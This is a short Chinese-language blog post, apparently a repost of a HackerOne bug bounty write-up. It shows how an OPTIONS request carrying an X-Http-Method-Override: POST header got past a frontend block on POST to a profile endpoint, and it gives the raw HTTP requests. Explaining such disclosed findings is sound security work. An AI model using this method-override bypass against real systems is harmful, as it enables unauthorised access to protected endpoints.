首先,某网站的端点的请求抓包如下:
POST /user/profile/exists HTTP/2Host: api.[redacted].comAuthorization: Bearer <jwt>Content-Type: application/json;charset=UTF-8{"":""}
请求后的响应是 403 错误。
然后将 POST 请求方式修改为 OPTIONS ,并在请求中添加‘私货’,再次尝试:
OPTIONS /user/profile/exists HTTP/2Host: api.[redacted].comX-Http-Method-Override: POSTAuthorization: Bearer <jwt>Content-Type: application/json;charset=UTF-8{"":""}
获得响应:
虽然前端禁止了 POST 请求,但却疏忽了 OPTIONS 请求,从而使攻击者可以成功绕过 POST 请求限制。
而这种‘疏忽’,却可以让攻击者:
利用被饶过的访问控制,使攻击者可以悄无声息地访问到本应禁止访问的端点
希望对你能有所启发~
原文:https://ayushkr12.medium.com/smuggling-my-way-past-frontend-filters-a-fun-find-on-hackerone-4424dad3a16e
- END -
原文始发于微信公众号(骨哥说事):通过 OPTIONS 请求+方法走私:HackerOne赏金案例解析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论